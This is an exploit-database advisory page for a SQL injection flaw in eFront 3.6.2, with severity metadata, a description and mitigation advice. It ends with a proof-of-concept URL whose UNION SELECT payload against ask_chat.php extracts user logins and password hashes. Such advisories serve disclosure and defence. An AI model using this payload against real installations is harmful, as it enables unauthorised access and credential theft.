header-logo
Suggest Exploit
vendor:
eFront
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: eFront
Affected Version From: 3.6.2002
Affected Version To: 3.6.2002
Patch Exists: NO
Related CWE: Unknown
CPE: a:efront_project:efront:3.6.2
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

SQL Injection in eFront

eFront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40032/info

eFront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.2 and prior versions are vulnerable. 

http://www.example.com/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x